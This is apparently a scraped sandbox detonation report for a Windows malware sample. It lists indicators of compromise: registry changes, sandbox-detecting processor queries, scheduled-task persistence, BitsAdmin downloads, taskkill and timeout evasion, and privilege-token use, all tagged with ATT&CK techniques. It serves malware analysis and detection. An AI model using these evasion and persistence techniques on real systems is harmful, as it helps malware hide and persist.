Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MfR5P3jtbVt2lnIZPTc_I1w1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MfR5P3jtbVt2lnIZPTc_I1w1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ffskZYr_cWNnRFcTcHnN5XZN.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cmd.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

CrowdInspect.exesvchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CrowdInspect.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	CrowdInspect.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Creates scheduled task(s) 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
8876	schtasks.exe
3996	schtasks.exe
7876	schtasks.exe
6548	schtasks.exe
6684	schtasks.exe
2224	schtasks.exe
9796	schtasks.exe
9576	schtasks.exe
6140	schtasks.exe
5104	schtasks.exe
7208	schtasks.exe
6540	schtasks.exe
13400	schtasks.exe

Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

9252 timeout.exe
5708 timeout.exe
12480 timeout.exe
Download via BitsAdmin 1 TTPs 2 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exebitsadmin.exe

pid process

6432 bitsadmin.exe
14160 bitsadmin.exe

pid	process
9252	timeout.exe
5708	timeout.exe
12480	timeout.exe

pid	process
6432	bitsadmin.exe
14160	bitsadmin.exe

Kills process with taskkill 20 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
9368	taskkill.exe
13244	taskkill.exe
6536	taskkill.exe
5080	taskkill.exe
3628	taskkill.exe
13492	taskkill.exe
12528	taskkill.exe
7028	taskkill.exe
7140	taskkill.exe
7632	taskkill.exe
592	taskkill.exe
5384	taskkill.exe
12556	taskkill.exe
5836	taskkill.exe
13568	taskkill.exe
1308	taskkill.exe
9652	taskkill.exe
10968	taskkill.exe
11136	taskkill.exe
7508	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 16 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exemalware.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exesvchost.exerundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	malware.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8776daea2bc5d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IFW2IAU0-YI0T-SZ81-840P-PAI76YIYJF79}	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IFW2IAU0-YI0T-SZ81-840P-PAI76YIYJF79}\7289246C77593EBF\2 = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WLD4WMQ3-MJ3I-MV57-663Y-EXT24WLKVJ14}	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QAM9LTZ0-JH7G-LF06-519I-JDH27ZPEPA24}\1 = "7232"	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IFW2IAU0-YI0T-SZ81-840P-PAI76YIYJF79}\650478DC7424C37C	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{FC6241BB-5D42-4A86-ACE6-2E979246D11B}"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEI2WPE3-XE1H-AE42-701D-DPK87XELRL76}\1 = "2302"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{TKR9TRJ3-XT3I-VY52-597M-MXZ27DTVMS64}	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = eda47e9320aed701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = eda47e9320aed701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000545ef253c6d3598076ffaed679d83cf65c395bd0ba5258769352480b096ff20b9dc5f58eedbd96ecf8e0a27eae638a5e73565bfa02b3efa1a94a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

4064 reg.exe
12604 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

9232 PING.EXE
6472 PING.EXE
10244 PING.EXE
7548 PING.EXE

pid	process
4064	reg.exe
12604	reg.exe

pid	process
9232	PING.EXE
6472	PING.EXE
10244	PING.EXE
7548	PING.EXE

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	338	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	732	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	3382	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	3385	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

CrowdInspect64.exe

pid	process
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe
2392	CrowdInspect64.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

CrowdInspect64.exe

pid process

2392 CrowdInspect64.exe
392
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

MfR5P3jtbVt2lnIZPTc_I1w1.exeffskZYr_cWNnRFcTcHnN5XZN.exeM5OEbtR68Nhc4IN3TRyoAffj.exe

pid process

5268 MfR5P3jtbVt2lnIZPTc_I1w1.exe
5292 ffskZYr_cWNnRFcTcHnN5XZN.exe
9824 M5OEbtR68Nhc4IN3TRyoAffj.exe
Suspicious behavior: SetClipboardViewer 2 IoCs

Processes:

5074095.exe6793617.exe

pid process

9136 5074095.exe
9276 6793617.exe

pid	process
5268	MfR5P3jtbVt2lnIZPTc_I1w1.exe
5292	ffskZYr_cWNnRFcTcHnN5XZN.exe
9824	M5OEbtR68Nhc4IN3TRyoAffj.exe

pid	process
9136	5074095.exe
9276	6793617.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeCrowdInspect64.exe

description	pid	process
Token: SeDebugPrivilege	2336	MicrosoftEdge.exe
Token: SeDebugPrivilege	2336	MicrosoftEdge.exe
Token: SeDebugPrivilege	2336	MicrosoftEdge.exe
Token: SeDebugPrivilege	2336	MicrosoftEdge.exe
Token: SeDebugPrivilege	2336	MicrosoftEdge.exe
Token: SeDebugPrivilege	648	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	648	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	648	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	648	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
Token: SeDebugPrivilege	2392	CrowdInspect64.exe
